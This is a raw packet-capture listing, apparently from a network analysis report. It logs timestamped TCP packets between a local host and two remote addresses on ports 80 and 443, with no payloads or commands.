                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383562088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383568048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383589029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.383603096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384409904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384453058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384462118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384480000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384497881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.384520054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385287046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385328054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385329962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385346889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385375977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.385390043 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391046047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391091108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391125917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391165018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391258001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391294956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391309977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391333103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391352892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.391366005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392134905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392201900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392208099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392225027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392242908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.392266989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549243927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549323082 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549325943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549362898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549365044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549406052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549521923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549571037 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549580097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549621105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549631119 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.549669027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550390959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550436020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550601959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550642967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550657988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550695896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550708055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.550731897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551481962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551528931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551537037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551572084 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551583052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.551611900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552378893 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552489042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552491903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552530050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552930117 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552975893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.552985907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553024054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553035021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553069115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553824902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553872108 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553880930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553915977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553921938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.553966045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554689884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554742098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554745913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554781914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554786921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.554825068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555583000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555632114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555636883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555672884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555676937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.555713892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556478977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556528091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556533098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556567907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556574106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.556607008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557379961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557435036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557461977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557470083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557475090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.557533026 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558270931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558305979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558325052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558341980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558353901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.558386087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559135914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559191942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559196949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559226990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559231997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.559267998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560041904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560096979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560107946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560132027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560151100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560173988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560909033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560966015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.560967922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561005116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561018944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561074018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561813116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561866045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561870098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561906099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561917067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.561949968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562772036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562808037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562820911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562846899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562856913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.562887907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563611031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563657999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563666105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563702106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563728094 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.563739061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564594030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564644098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564702988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564738989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564752102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.564783096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565382004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565435886 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565457106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565491915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565505028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.565540075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566252947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566304922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566308975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566343069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566345930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.566381931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567152977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567200899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567208052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567245007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567266941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.567297935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568279028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568314075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568322897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568350077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568382025 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568397045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.568974018 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569010019 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569021940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569048882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569048882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569087982 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569834948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569869995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569878101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.569905996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.570022106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.570064068 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.570718050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.570759058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571002007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571046114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571072102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571106911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571111917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.571149111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572014093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572069883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572081089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572108030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572108984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572144985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572789907 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572885990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572896004 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572932959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572937012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.572973967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573677063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573725939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573734045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573771000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573777914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.573811054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574567080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574620008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574621916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574657917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574670076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.574697018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575475931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575522900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575531960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575577021 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575582027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.575623989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576347113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576396942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576404095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576438904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576452017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.576482058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577214003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577265024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577269077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577305079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577316046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.577352047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583275080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583344936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583375931 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583411932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583429098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583452940 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583761930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583812952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583817005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583852053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583877087 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.583889008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.584605932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.584652901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.602324963 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.602395058 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.604830027 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.604845047 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.605057955 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.606820107 CET49875443192.168.2.4185.199.111.133
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.651339054 CET44349875185.199.111.133192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741288900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741347075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741381884 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741420984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741421938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741421938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741647959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741703987 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741704941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741740942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741754055 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.741789103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742526054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742573977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742718935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742764950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742773056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742808104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742815018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.742852926 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743670940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743777990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743798971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743834019 CET804986031.41.244.11192.168.2.4
